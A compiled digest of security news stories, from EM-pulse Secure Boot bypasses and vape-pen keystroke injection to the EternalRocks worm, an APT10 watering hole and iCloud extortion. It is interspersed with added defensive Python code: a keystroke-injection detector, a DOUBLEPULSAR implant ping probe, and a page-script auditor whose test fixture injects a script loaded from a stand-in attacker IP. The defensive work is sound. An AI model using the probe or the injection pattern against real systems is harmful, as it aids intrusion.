  13. When you think of a standard hacker toolkit, software vulnerabilities and malware come to mind. But a pair of researchers are testing a different type of instrument: a physical tool that can break into devices with a wave of your hand. At the recent REcon computer security conference, Red Balloon Security founder Ang Cui and research scientist Rick Housley presented a new approach to hacking a processor that uses electromagnetic pulses to produce specific glitches in hardware. By disrupting normal activity at precise intervals, the technique can defeat the Secure Boot protection that keeps processors from running untrusted code. Researchers have experimented with “fault injection attacks”—hacks that cause a strategic glitch, which in turn triggers abnormal, exploitable computer behavior—for decades. Those attacks, though, typically require physical access to a target's components. “The advantage of this technique is that it’s physically noninvasive. You don’t have to touch the device, and you don’t leave any physical marks behind,” Cui says. “There’s no exchange of data at the electromagnetic pulse stage, so this would never be caught by a firewall.” Insecure Boot Red Balloon specializes in internet-of-things-intrusion defense; think of it as antivirus software for IoT. But the company has run into problems putting its security tool on IoT devices guarded by Secure Boot. Red Balloon's products don't undermine this safeguard; the company works with vendors to make its software compatible. But the dilemma got Cui and Housley interested in the theoretical question of whether a fault-injection attack could circumvent Secure Boot on locked-down IoT devices. They started experimenting with the Cisco 8861 VoIP phone model that they had tried and failed to equip with their security product. (Cui also has a history of hacking Cisco phones.) 
The two found that if they poked the phone’s flash memory with a charged wire at the right moment while it booted up, they could cause a glitch that stopped the boot process. Instead, the phone surfaced access to a command-line interface that Cisco normally uses for debugging. Consumers are never supposed to see it. Cui and Housley also found vulnerabilities in the TrustZone security scheme of the phone's processor that allowed them to write code on processor memory that was supposed to be protected. (They disclosed these bugs to Cisco in April 2016.) Once they had access to the troubleshooting portal during boot, the researchers could load and execute their own code in a secure part of the processor to override Secure Boot. Invisible Touch All of which makes for a complicated hack, and one that requires cracking a phone open when you have a charged wire handy. But Cui and Housley wanted to take the attack a step farther, and realized that a well-timed EMP blast could trigger the same fault. They could execute the whole hack without needing to tamper with the components of the phone. Lab-grade EM pulsing equipment costs hundreds of thousands of dollars, so instead the researchers built their own system for about $350 using a 3-D printer and readily available components. They plan to release open source schematics of the setup so other researchers can use it too. Eventually, Cui and Housley worked out that delivering a 300 volt pulse to the phone's RAM 4.62 seconds into startup reliably created the glitch they wanted. With access to the debugging portal, they could use the phone’s console port—an auxiliary port on the back of the phone—to load in and run their Secure Boot override protocol within five seconds. "The attack’s principle is clever," says Jean-Max Dutertre, a hardware security researcher at École Nationale Supérieure des Mines de Saint-Étienne in France. "Finding a way to bypass timing and spatial resolution issues is always highly effective." 
The system can currently deliver the pulse from 3 millimeters away from the phone, so while the hack doesn't require physical contact, it does need proximity. Still, an attacker could cause the crucial fault by, say, waving their hand over the device while holding a tiny electromagnetic pulse generator—a subtler action than opening up the phone and sticking a wire into it. “With any hardware attack you need to be physically present, so that’s already a huge barrier,” says Jasper van Woudenberg, the chief technology officer of Riscure North America, a firm that tests hardware and software security. “But this is a nice proof of concept to show that if you don’t take care of these attacks, they could actually happen.” Who's Down With EMP What makes the attack so challenging is, in part, the Broadcom multicore 1GHz ARM processor it targets. Modern processors pack transistors in densely and have high clock speeds, making it difficult to discharge EM pulses quickly and accurately enough to impact one specific process on a chip without collateral damage. But by thinking of the interconnected components in a device (like the processor, flash memory, and RAM) as a network of computers in and of themselves, researchers can create fault injection strategies that are more like network hacking—attacking a system's weakest point to compromise the real target, in this case the powerful processor. “We wanted to look at the second-order effects of an electromagnetic pulse, as it affects not just a single machine but a complex network of interdependent components,” Cui says. “So that allows us to sidestep the traditional electromagnetic fault injection limitations, and use electromagnetic pulses to predictably change the way computers compute.” As electromagnetic fault injection hacking becomes more robust, it will in turn become more important to protect components from physical, noninvasive hacks. 
Some ultrasecure devices already include such defenses, because further refinement would put not only IoT devices at risk but also full-service computers. "This kind of attack could be devastating because it is relatively easy to perform," Dutertre says. And while Cui and Housley's research exists strictly as a proof of concept, they caution that other groups may have capabilities that far exceed academia's. “We don’t think we’re the farthest along in this research,” Cui says. “We’ve been doing this on our off time as a side project. If somebody wanted to put significant resource into this, they would certainly be ahead of us." < Here >
  14. Even if a vape pen seems like it's simply charging, it could actually be compromising your computer, security researchers warn. Security researchers have demonstrated how e-cigarettes can easily be modified into tools to hack computers. With only minor modifications, the vape pen can be used by attackers to compromise the computers they are connected to - even if it seems just like they are charging. Giving a presentation at BSides London, Ross Bevington showed how an e-cigarette could be used to attack a computer by fooling the computer to believe it was a keyboard or by tampering with its network traffic. While Mr Bevington's particular form of attack required the victim's machine to be unlocked, that was not the case for all attacks. "PoisonTap is a very similar style of attack that will even work on locked machines," Mr Bevington told Sky News. Another hacker and researcher known as Fouroctets published a proof-of-concept video which showed arbitrary commands being entered into his unlocked laptop just after plugging in a vape pen to charge. Speaking to Sky News, Fouroctets said he had modified the vape pen by simply adding a hardware chip which allowed the device to communicate with the laptop as if it were a keyboard or mouse. A pre-written script that was saved on the vape made Windows open up the Notepad application and typed "Do you even vape bro!!!!" The script could have been modified to do something much more malicious, however. Fouroctets showed Sky News how, using less than 20 lines of code, the computer could be made to download an arbitrary and potentially dangerous file and run it. While e-cigarettes could be used to deliver malicious payloads to machines, there is usually very little space available on them to host this code. "This puts limitations on how elaborate a real attack could be made," said Mr Bevington. "The WannaCry malware for instance was 4-5MB, hundreds of times larger than the space on an e-cigarette. 
That being said, using something like an e-cigarette to download something larger from the Internet would be possible." The best way to protect against these kinds of attacks is to ensure that your machine has updated its security patches, said Mr Bevington, and to "have a good password and lock your machine when you leave it". "If you run a business you should invest in some kind of monitoring solution that can alert your security team when something like this attack occurs," he said. "In all cases, be wary if someone wants to plug something into your machine." < Here >
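Bevington's last recommendation, a monitoring solution that alerts when a device like this starts typing, rests on one observable: a scripted HID payload types far faster and more regularly than a person. The following is an added example, not code from the article or either researcher, of that heuristic applied to a stream of key-down events. The event format and device identifiers are assumptions (an endpoint agent would supply whatever its OS exposes), and the sample timings are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class KeyEvent:
    t_ms: float    # timestamp of the key-down event, in milliseconds
    device: str    # identifier of the HID device that produced it (format assumed)


def build_sample():
    """Constructed input: a person typing at ~150 ms per key on the real keyboard,
    then a freshly attached 'charger' that types a 60-key payload at 5 ms per key."""
    human = [KeyEvent(1000 + 150 * i, "usb:046d:c31c") for i in range(20)]
    rogue = [KeyEvent(5000 + 5 * i, "usb:2341:8036") for i in range(60)]
    return human + rogue


def detect_injection(events, window_ms=500, min_keys=30, max_mean_gap_ms=25.0):
    """Flag any device that delivers at least `min_keys` keystrokes within
    `window_ms` with a mean inter-key gap of at most `max_mean_gap_ms`.
    Human typing rarely sustains gaps under ~50 ms; scripted HID payloads do."""
    by_device = defaultdict(list)
    for e in events:
        by_device[e.device].append(e.t_ms)

    flagged = {}
    for dev, ts in by_device.items():
        ts.sort()
        start = 0
        for end in range(len(ts)):
            # Shrink the window from the left until it spans at most window_ms.
            while ts[end] - ts[start] > window_ms:
                start += 1
            n = end - start + 1
            if n >= min_keys:
                mean_gap = (ts[end] - ts[start]) / (n - 1)
                if mean_gap <= max_mean_gap_ms:
                    flagged[dev] = {
                        "keys": n,
                        "mean_gap_ms": round(mean_gap, 2),
                        "first_key_ms": ts[start],
                    }
                    break
    return flagged


if __name__ == "__main__":
    for dev, info in detect_injection(build_sample()).items():
        print(f"keystroke injection suspected from {dev}: {info}")
```

The thresholds are deliberately conservative so that fast typists and key repeat are not flagged; the point is the combination of a newly enumerated keyboard and a burst of machine-paced input, which is exactly what the vape-pen demonstration produces.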
  15. Researchers have detected a new worm that is spreading via SMB, but unlike the worm component of the WannaCry ransomware, this one is using seven NSA tools instead of two. The worm's existence first came to light on Wednesday, after it infected the SMB honeypot of Miroslav Stampar, member of the Croatian Government CERT, and creator of the sqlmap tool used for detecting and exploiting SQL injection flaws. EternalRocks uses seven NSA tools The worm, which Stampar named EternalRocks based on worm executable properties found in one sample, works by using six SMB-centric NSA tools to infect a computer with SMB ports exposed online. These are ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY, which are SMB exploits used to compromise vulnerable computers, while SMBTOUCH and ARCHITOUCH are two NSA tools used for SMB reconnaissance operations. Once the worm has obtained this initial foothold, it then uses another NSA tool, DOUBLEPULSAR, to propagate to new vulnerable machines. Origin of the EternalRocks name The WannaCry ransomware outbreak, which affected over 240,000 victims, also used an SMB worm to infect computers and spread to new victims. Unlike EternalRocks, WannaCry's SMB worm used only ETERNALBLUE for the initial compromise, and DOUBLEPULSAR to propagate to new machines. EternalRocks is more complex but less dangerous As a worm, EternalRocks is far less dangerous than WannaCry's worm component, as it currently does not deliver any malicious content. This, however, does not mean that EternalRocks is less complex. According to Stampar, it's actually the opposite. For starters, EternalRocks is far more sneaky than WannaCry's SMB worm component. Once it infects a victim, the worm uses a two-stage installation process, with a delayed second stage. During the first stage, EternalRocks gains a foothold on an infected host, downloads the Tor client, and beacons its C&C server, located on a .onion domain, the Dark Web. 
Only after a predefined period of time — currently 24 hours — does the C&C server respond. The role of this long delay is most probably to bypass sandbox security testing environments and security researchers analyzing the worm, as very few will wait a full day for a response from the C&C server. No kill switch domain Additionally, EternalRocks also uses files with identical names to the ones used by WannaCry's SMB worm, in another attempt to fool security researchers into misclassifying it. But unlike WannaCry, EternalRocks does not include a kill switch domain, the Achilles' heel that security researchers used to stop the WannaCry outbreak. After the initial dormancy period expires and the C&C server responds, EternalRocks goes into the second stage of its installation process and downloads a second stage malware component in the form of an archive named shadowbrokers.zip. The name of this file is pretty self-explanatory, as it contains NSA SMB-centric exploits leaked by the Shadow Brokers group in April 2017. The worm then starts a rapid IP scanning process and attempts to connect to random IP addresses. The configuration files for NSA tools found in the shadowbrokers.zip archive EternalRocks could be weaponized in an instant Because of its broader exploit arsenal, the lack of a kill switch domain, and because of its initial dormancy, EternalRocks could pose a serious threat to computers with vulnerable SMB ports exposed to the Internet, if its author would ever decide to weaponize the worm with ransomware, a banking trojan, RATs, or anything else. At first glance, the worm seems to be an experiment, or a malware author performing tests and fine-tuning a future threat. This, however, does not mean EternalRocks is harmless. Computers infected with this worm are controllable via C&C server commands and the worm's owner could leverage this hidden communications channel to send new malware to the computers previously infected by EternalRocks. 
Furthermore, DOUBLEPULSAR, an NSA implant with backdoor features, remains running on PCs infected with EternalRocks. Unfortunately, the worm's author has not taken any measures to protect the DOUBLEPULSAR implant, which runs in a default unprotected state, meaning other threat actors could use it as a backdoor to machines infected by EternalRocks, by sending their own malware to those PCs. IOCs and more info on the worm's infection process are available in a GitHub repo Stampar set up a few days ago. An SMB free-for-all Currently, there are multiple actors scanning for computers running older and unpatched versions of the SMB services. System administrators have already taken notice and started patching vulnerable PCs or disabling the old SMBv1 protocol, slowly reducing the number of vulnerable machines that EternalRocks can infect. Furthermore, malware such as Adylkuzz also shuts down SMB ports, preventing further exploitation from other threats, also contributing to reducing the number of potential targets for EternalRocks and other SMB-hunting malware. Reports from Forcepoint, Cyphort, and Secdo detail other threats currently targeting computers with SMB ports. Nonetheless, the faster system administrators patch their systems the better. "The worm is racing with administrators to infect machines before they patch," Stampar told Bleeping Computer in a private conversation. "Once infected, he can weaponize any time he wants, no matter the late patch." Article source
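The practical takeaway from the post above is that an unprotected DOUBLEPULSAR implant left by EternalRocks is itself detectable from the network. Public write-ups of the implant describe a ping: send an SMB1 Trans2 request with the SESSION_SETUP setup word, and an infected host answers with the request's Multiplex ID plus 0x10 (0x41 becomes 0x51) where a clean host echoes it unchanged. The following is an added example, not code from Stampar's repository or the article, that builds that frame and classifies a reply. It assumes the NEGOTIATE, SESSION_SETUP and TREE_CONNECT to IPC$ have already been done on the socket and that the SMB1 header layout is as in the struct below; the sample replies are constructed, and the opcode the real implant reads from the Trans2 Timeout field is left at zero as a placeholder.

```python
import struct

# SMB1 header: protocol id, command, NT status, flags, flags2, PID high,
# security signature, reserved, TID, PID low, UID, MID (32 bytes, little-endian).
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_COM_TRANSACTION2 = 0x32
TRANS2_SESSION_SETUP = 0x000E
PING_MID = 0x41            # Multiplex ID the probe sends
INFECTED_MID_DELTA = 0x10  # implant answers with MID + 0x10, i.e. 0x51


def build_ping(tid, uid, mid=PING_MID):
    """Minimal SMB_COM_TRANSACTION2 carrying setup word SESSION_SETUP, framed for
    the NetBIOS session service. `tid`/`uid` come from an earlier tree connect
    to IPC$ (assumed). The Timeout field, where the implant expects an opcode,
    is a zero placeholder here."""
    header = SMB_HEADER.pack(b"\xffSMB", SMB_COM_TRANSACTION2, 0, 0x18, 0xC007,
                             0, b"\x00" * 8, 0, tid, 0xFEFF, uid, mid)
    words = struct.pack("<HHHHBBHIHHHHHBBH",
                        0, 0, 0, 0,      # total param/data, max param/data
                        0, 0, 0,         # max setup, reserved, flags
                        0,               # timeout (opcode placeholder)
                        0, 0, 0, 0, 0,   # reserved2, param count/offset, data count/offset
                        1, 0,            # setup count, reserved3
                        TRANS2_SESSION_SETUP)
    body = bytes([15]) + words + struct.pack("<H", 0)   # WordCount=15, ByteCount=0
    smb = header + body
    return struct.pack(">I", len(smb)) + smb             # NetBIOS length prefix


def parse_header(frame):
    """Strip the NetBIOS prefix and unpack the SMB1 header into a dict."""
    if len(frame) < 4 + SMB_HEADER.size:
        raise ValueError("frame too short")
    f = SMB_HEADER.unpack(frame[4:4 + SMB_HEADER.size])
    if f[0] != b"\xffSMB":
        raise ValueError("not an SMB1 frame")
    return {"command": f[1], "status": f[2], "signature": f[6],
            "tid": f[8], "uid": f[10], "mid": f[11]}


def classify_reply(frame, sent_mid=PING_MID):
    """'infected' if the host echoed MID + 0x10, 'clean' if it echoed MID unchanged."""
    h = parse_header(frame)
    if h["command"] != SMB_COM_TRANSACTION2:
        return "unexpected"
    if h["mid"] == sent_mid + INFECTED_MID_DELTA:
        return "infected"
    if h["mid"] == sent_mid:
        return "clean"
    return "unknown"


def make_reply(mid, status=0xC0000002):
    """Constructed server reply for offline testing: header plus empty word and
    byte blocks. The status value (STATUS_NOT_IMPLEMENTED) is an assumption."""
    header = SMB_HEADER.pack(b"\xffSMB", SMB_COM_TRANSACTION2, status, 0x98, 0xC007,
                             0, b"\x00" * 8, 0, 0x0800, 0xFEFF, 0x0800, mid)
    smb = header + bytes([0]) + struct.pack("<H", 0)
    return struct.pack(">I", len(smb)) + smb


if __name__ == "__main__":
    print("ping frame:", build_ping(tid=0x0800, uid=0x0800).hex())
    print("reply 0x51:", classify_reply(make_reply(0x51)))
    print("reply 0x41:", classify_reply(make_reply(0x41)))
```

Sweeping a network with this probe finds the machines whose implant is open to any third party, which is the exposure Stampar warns about; the fix is the one the post already gives, patching and disabling SMBv1, after which the probe gets no SMB1 session at all.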
  16. Hackers managed to inject the NFTC website with malicious code in a watering hole attack. Nation-state-level hackers based out of China have targeted directors at some of the world's largest firms by compromising the website of a global trade lobby group. The sophisticated nature of the campaign against the Washington-based National Foreign Trade Council has led cybersecurity researchers at Fidelis to the conclusion that the attacks were carried out by the Chinese APT10 hacking group. It's the second time in a week that an APT10 campaign has come to light, with PwC also detailing how the group has been targeting managed IT services providers across the globe in order to steal sensitive data. The latest campaign, dubbed Operation Tradesecret, has been detailed in a new report, and has come to light just ahead of US President Donald Trump's meeting with Chinese President Xi Jinping. The two leaders are expected to discuss cyber warfare and cybersecurity. The number of cyberattacks emerging from China has declined recently, although the incidents that are taking place are more sophisticated and targeted. Fidelis security researchers say specific pages of NFTC's website were injected with a watering hole attack link, designed to run malware to compromise a very precise set of targets: those registering for specific meetings at the NFTC, such as a board of directors meeting in Washington DC. The targeted individuals hold key roles in some of the largest corporations in the world and gaining access to their personal data and sensitive corporate information would be a boon for hackers looking for ways to steal company secrets. This particular campaign took place between February 27 and March 1, with malicious links on the NFTC website serving Scanbox malware, a well-known web reconnaissance tool that has been used in cyberespionage campaigns dating back to at least 2014. It has also been associated with campaigns linked to the Chinese government. 
Cyberespionage capabilities of Scanbox -- which was also used in attacks against the US Office of Personnel Management and Anthem Healthcare -- include monitoring which websites were viewed by the victim as well as their operating system, screen size, and location, along with keylog monitoring. The latter potentially enables attackers to make off with login details and passwords for internal networks and even compromise others using phishing attacks. Indeed, Fidelis notes how the watering hole attack against the National Foreign Trade Council is likely to be a precursor for an upcoming sustained campaign against targets -- and those affected should be mindful. "The reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that such personnel will be subject to further targeted attempts to compromise them -- for example, through spearphishing campaigns," the report warns. The malicious link itself was removed from the NFTC website on March 2 and Fidelis briefed the organisation about the incident shortly after it was discovered. The APT10 hacking collective has been focusing on espionage since 2009 and has evolved from targeting US defence firms, as well as the technology and telecommunications sectors, to organisations in multiple industries across the globe. The group was behind the Poison Ivy malware family, and today uses custom tools capable of compromising organisations and their customers, as well as stealing large amounts of data. Source
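A watering hole of the kind described above lives for days because nobody compares the served page against what the site is supposed to contain. The following is an added example, not code from Fidelis or the NFTC, of a small integrity check for exactly that: it extracts every script the page loads, accepts external scripts only from an allowlist of hosts, and accepts inline scripts only when their digest matches a baseline taken from the known-good page. The two HTML pages and the injected host (198.51.100.77, documentation space) are constructed for the example and are not Scanbox's real infrastructure.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script sources and SHA-256 digests of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline = True
                self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            body = "".join(self._buf).strip().encode("utf-8")
            self.inline.append(hashlib.sha256(body).hexdigest())


def collect(html):
    """Return (external script URLs, inline script digests) for a page."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return p.external, p.inline


def audit(html, allowed_hosts, baseline_inline):
    """Report scripts not covered by the known-good baseline: external scripts
    from hosts outside `allowed_hosts` (relative URLs are first-party and pass)
    and inline scripts whose digest is not in `baseline_inline`."""
    external, inline = collect(html)
    findings = []
    for src in external:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for digest in inline:
        if digest not in baseline_inline:
            findings.append(("inline-script", digest))
    return findings


# Constructed pages for the example: the registration page as published, and the
# same page with one injected script tag pointing at an attacker-controlled host.
BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
<script>window.registrationForm = true;</script>
</head><body><h1>Board meeting registration</h1></body></html>"""

COMPROMISED_HTML = BASELINE_HTML.replace(
    "</head>", '<script src="http://198.51.100.77/s.js"></script>\n</head>')

ALLOWED_HOSTS = {"cdn.example.org"}
BASELINE_INLINE = set(collect(BASELINE_HTML)[1])


if __name__ == "__main__":
    print("baseline:   ", audit(BASELINE_HTML, ALLOWED_HOSTS, BASELINE_INLINE))
    print("compromised:", audit(COMPROMISED_HTML, ALLOWED_HOSTS, BASELINE_INLINE))
```

Run from outside the web server against the pages visitors actually receive, so that a compromise of the server itself cannot hide the injected tag; the same allowlist is also what a Content-Security-Policy `script-src` directive would enforce in the browser.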
  17. VMware has released critical security patches for vulnerabilities demonstrated during the recent Pwn2Own hacking contest that could be exploited to escape from the isolation of virtual machines. The patches fix four vulnerabilities that affect VMware ESXi, VMware Workstation Pro and Player and VMware Fusion. Two of the vulnerabilities, tracked as CVE-2017-4902 and CVE-2017-4903 in the Common Vulnerabilities and Exposures database, were exploited by a team from Chinese internet security firm Qihoo 360 as part of an attack demonstrated two weeks ago at Pwn2Own. The team's exploit chain started with a compromise of Microsoft Edge, moved to the Windows kernel, and then exploited the two flaws to escape from a virtual machine and execute code on the host operating system. The researchers were awarded $105,000 for their feat. Pwn2Own is an annual hacking contest organized by Trend Micro's Zero Day Initiative (ZDI) program that runs during the CanSecWest conference in Vancouver, British Columbia. Researchers receive cash prizes for demonstrating zero-day -- previously unknown -- exploits against browsers, operating systems and other popular enterprise software programs. This year, the contest organizers added prizes for exploits in hypervisors like VMware Workstation and Microsoft Hyper-V and two teams stepped up to the challenge. The second team, made up of researchers from the Keen Lab and PC Manager divisions of internet services provider Tencent, exploited the two other flaws patched by VMware this week: CVE-2017-4904 and CVE-2017-4905. The latter is a memory information leak vulnerability that is rated only as moderate, but which could help hackers pull off a more serious attack. Users are advised to update VMware Workstation to version 12.5.5 on all platforms and VMware Fusion to version 8.5.6 on macOS (OS X). Individual patches are also available for ESXi 6.5, 6.0 U3, 6.0 U2, 6.0 U1 and 5.5, where applicable. 
Virtual machines are often used to create throw-away environments that pose no threat to the main operating system in case of compromise. For example, malware researchers execute malicious code and visit suspicious URLs inside virtual machines to observe their behavior. Companies also run many applications inside virtual machines to limit the potential impact if they're compromised. One of the main goals of hypervisors like VMware Workstation is to create a barrier between the guest operating system that runs inside the virtual machine and the host OS where the hypervisor runs. That's why VM escape exploits are highly prized among hackers. Source
  18. FBI Director James Comey (left) testifies in front of the House Intelligence Committee on Monday regarding Russian hacking during the 2016 election. The agency's director, James Comey, confirms the FBI is looking into any possible ties between the president's campaign and the Russian government. In a rare move, the FBI confirmed that it is investigating whether Russian hackers had any links to President Trump's election team. Citing "unusual circumstances," FBI Director James Comey said that the bureau is looking into whether Trump's campaign worked with Russian officials during the 2016 election. "I have been authorized by the Department of Justice to confirm that the FBI, as part of our counterintelligence mission, is investigating the Russian government's efforts to interfere in the 2016 presidential election," Comey testified at a House committee hearing on Monday. "That includes investigating the nature of any links between individuals associated with the Trump campaign and the Russian government, and whether there was any coordination with the campaign and Russia's efforts." These are unusual circumstances indeed. Worries about Russian hacks plagued the US presidential election and its aftermath, with US intelligence agencies accusing Russia of meddling in the race for the White House. The House Intelligence Committee is investigating how the cyberattacks happened and how to protect the nation's democratic processes from interference in the future. The breaches included hacking emails from the Democratic National Committee, Democratic candidate Hillary Clinton and her campaign manager, John Podesta. Comey had earlier testified before the House Intelligence committee concerning Russian hacks during the election, revealing there were no attacks against the Trump campaign or the Republican National Committee. During the campaign, Donald Trump publicly urged Russia to help turn up Clinton's emails. 
Members of the Trump administration, including attorney general Jeff Sessions, former national security adviser Michael Flynn and Secretary of State Rex Tillerson, have also faced controversy for ties to Russian officials. The Obama administration in late December retaliated against Russia, imposing sanctions over the cyberattacks even as Russian officials continue to deny any involvement in the hacks. Russia's relationship with the US has been on shaky ground since. Comey revealed that the FBI has been investigating Russian influence on the 2016 election since last July, when hackers apparently first infiltrated the DNC. It remains unclear when the investigation will end. During the hearing, Comey also rebutted President Trump's tweets that the Obama administration ordered a wiretap on Trump Tower during the campaign. That echoed House Intelligence committee chairman Devin Nunes and the Justice Department's findings. "I have no information that supports those tweets, and we have looked carefully inside the FBI," Comey said. The National Security Agency director Michael Rogers also denied Trump's claims during the hearing. Source
19. Your Apple iCloud account may be open to attacks.

Worried about hackers destroying your iCloud music, pictures, and documents? Here are three things you should do right now.

Maybe the London-based hacker group -- which goes by the name "Turkish Crime Family" -- doesn't have access to 250-million Apple iCloud account names and passwords. But they do have access to some indeterminate number of accounts, and that's more than enough reason to exercise caution: Protect your iCloud password and data today or risk losing it tomorrow. Here's how to do it.

Back up vulnerable data

First, you need to back up your iCloud data. Yes, I know Apple's idea was you could use iCloud to back up your Apple device data, and that's fine, but it's iCloud itself we're worried about today. For your iPhone, iPad, or iPod, the easiest way to do this is to back up your device's files to your Mac or PC with an iTunes backup.

1. Plug your device into your Mac or PC with iTunes on.
2. In iTunes' top left-hand corner, under the play controls, there's a tiny phone icon. Click it and it will take you to your device's menu.
3. Click on Summary in the left-hand column. You will be presented with three boxes. Choose Select Backups.
4. Choose to automatically or manually back up your device. If you choose automatic, every time you plug your gadget in, iTunes will start to back it up.

Backing up your Apple device locally, and not just to iCloud, is a good idea.

The only problem here is that iTunes doesn't back everything up. For example, it won't back up your Apple Pay information and settings, photos already on iCloud, or purchased iTunes and App Store content. So, to be safe, you really must change and secure your password.

Change your passwords

Apple could help here -- and not just by paying off the Turkish Crime Family. Other major sites -- like Amazon, Netflix, and LinkedIn -- buy cracked password lists, and use one-way hashing matches to check for existing passwords.
They then reset vulnerable passwords and ask users to switch passwords. Apple hasn't done that, but it should consider doing it, given just how large the threat appears to be. Since Apple isn't doing this, it's up to you. One thing that has always annoyed me is that Apple talks as if your Apple ID and iCloud ID are different. They're not. They're the same, and they use the same password. To change your Apple ID password, sign in to your Apple ID account page with any web browser and follow the instructions to reset your password. I changed mine using Google Chrome from a Mint Linux system. Your new Apple ID password must contain at least eight characters, a number, an uppercase letter, and a lowercase letter. You also can't use spaces, the same character three times in a row, your Apple ID, or a password you've used in the last year. Whatever you do, do NOT use dumb passwords such as "abcdefgh," "qwerty," or "password." The easiest way to create a secure password that won't try your memory is to use passphrases instead of passwords. Instead of working your nerves into a frenzy trying to memorize what the cat wrote when he jumped on the keyboard (e.g. "sdf9usdf"), use an easy-to-remember but nonsensical phrase instead. For example, "Plump/Trotting Pups:" or "UNC?Win!Duke?Lose!" or "AC!DC!Tesla!Edison?" These are easy to recall and hard for crackers to break. Once you've changed your password, you'll need to change it on all your Apple devices. Then, you're going to want to add another layer of protection: Two-factor authentication (2FA).

2FA

Apple's 2FA is clunky, but it still does a great job of protecting your account.

For additional protection, turn on Apple's two-factor authentication. When you activate 2FA, you can access your account only from trusted devices such as your iPhone, iPad, or Mac. When you want to sign in to a new device for the first time, you'll need to provide two pieces of information.
These are your Apple ID password and the six-digit verification code that's automatically displayed on your trusted devices. To use Apple 2FA, you'll also need a trusted phone number so you can receive verification codes. To add a trusted phone number, take the following steps:

1. Go to your Apple ID account page
2. Sign in with your Apple ID
3. Go to the Security section and click Edit
4. Click Add a Trusted Phone Number and enter the phone number

Now, you're ready for 2FA. For a trusted device, you need an iPhone, iPad, or iPod touch with iOS 9 or later, or you need a Mac running OS X El Capitan or later that you've already signed into with 2FA. To turn on Apple 2FA, take the following steps.

On your iPhone, iPad, or iPod touch with iOS 9 or later:

1. Go to Settings > iCloud > tap your Apple ID
2. Tap Password & Security
3. Tap Turn on Two-Factor Authentication

On your Mac with OS X El Capitan or later:

1. Go to Apple menu > System Preferences > iCloud > Account Details
2. Click Security
3. Click Turn on Two-Factor Authentication

Yes, this can be a lot of work. On the other hand, how much work would it take you to replace your important photos, music, books, or documents if your Apple iCloud account goes up in smoke? Take the time, do it now. You'll be glad you did. Source
20. Apple has received a ransom threat from a hacking group claiming to have access to data for up to 800 million iCloud accounts. The hackers, said to be a London-based group called the "Turkish Crime Family," have threatened to reset passwords and remotely wipe the iPhones of millions of iCloud users if Apple fails to hand over a total of US$700,000. They have given the company an ultimatum to respond by April 7. Apple reportedly has denied that the group succeeded in hacking its systems, maintaining that it obtained the email addresses and passwords from previously compromised third-party services. Apple is working with law enforcement on the threats. The data set in the iCloud hack matches the data found in the 2012 hack of 117 million accounts on LinkedIn, according to some published reports. However, the Turkish Crime Family strongly denied that in a message to TechNewsWorld on Friday.

Correcting the Message

The initial reports of a ransom demand of just $75,000 were incorrect, the group said in response to our email query. It actually demanded $100,000 for each of its seven members, plus "extra stuff from Apple that are worth more to us than money," which it promised Apple it would keep secret. The group also told TechNewsWorld that the only member based in London is Kerem Albayrek, who is facing charges related to listing a hacked Yahoo database for sale. It claimed that its iCloud ransom demands were in part to spread awareness of Albayrek, as well as of Karim Baratov, a Canadian resident charged earlier this month, along with a second hacker and two Russian FSB agents, in the 2014 breach of 500 million Yahoo account holders. The group told TechNewsWorld that it showed Apple scan logs that contain 800 million iCloud accounts, and that Apple claimed the data had come from outside sources. The group said it planned to launch a website that would list iCloud user names, last names, dates of birth and a captcha of their current location from an iCloud app.
The site will not disclose passwords initially, the group said, but it would do so "most probably in the future."

Shaking Down Apple

The Turkish Crime Family threat should be taken seriously, said Pierluigi Paganini, a cybersecurity analyst and member of the Cyber Group G7 2017 Summit in Italy. "I consider the threat is credible, even if it is quite impossible to know the exact number of iCloud credentials in the hands of hackers," he told TechNewsWorld. The group is known in the hacking underground for the sale of stolen databases, Paganini said. The group reportedly has approached several media outlets directly; it told TechNewsWorld that it had been in contact with five. However, it is unlikely that the group's efforts to stir public pressure against Apple will be effective, noted Mark Nunnikhoven, vice president for cloud research at Trend Micro, in an online post. Apple is too large and has too many resources to give in to public pressure, he pointed out. The group's demands are similar to a shakedown in the physical world, in which criminals demand monthly payments to "protect" a business, Nunnikhoven noted. "In the digital world, the pressures that make victims pay (e.g. keeping your store in one piece) don't apply," Nunnikhoven wrote. "With iCloud accounts, Apple has the ultimate safety valve ... they control the infrastructure behind the accounts," he added. "Which removes most of the pressure points criminals could use." There is no evidence of state involvement in this cyberthreat, Nunnikhoven told TechNewsWorld. However, there is "mounting evidence that this is a group whose eyes are bigger than their stomachs," he suggested. "Selling credentials on the underground is rather commonplace. Attempting to extort one of the biggest companies on the planet with poor quality data is quite another."

Credible Threat

A report in ZDNet appeared to lend credence to some of the hacking group's claims, however.
The group provided 54 credentials to the publication, which were verified as authentic based on a check of the password reset function. Most of the accounts were outdated, but 10 people did confirm to the publication that the obtained passwords were legitimate and that they since had changed them. Those 10 people were living in the UK, and had UK mobile numbers. Trend Micro is urging iCloud users to protect their accounts by using two-factor authentication, and also to use a password manager. A password manager helps users create unique passwords for every account and stores them remotely so that hackers cannot access one or two accounts and thereby gain access to many more. The FBI declined to comment for this story. Apple officials did not respond to our request to comment, and a Yahoo spokesperson was not immediately available. Source
21. Most Android phones don't have the latest security patch -- despite efforts by Google to distribute software fixes monthly via phone carriers -- researchers at Skycure found.

A cybersecurity company found that 71 percent of Android users on major US carriers are easy targets for hackers.

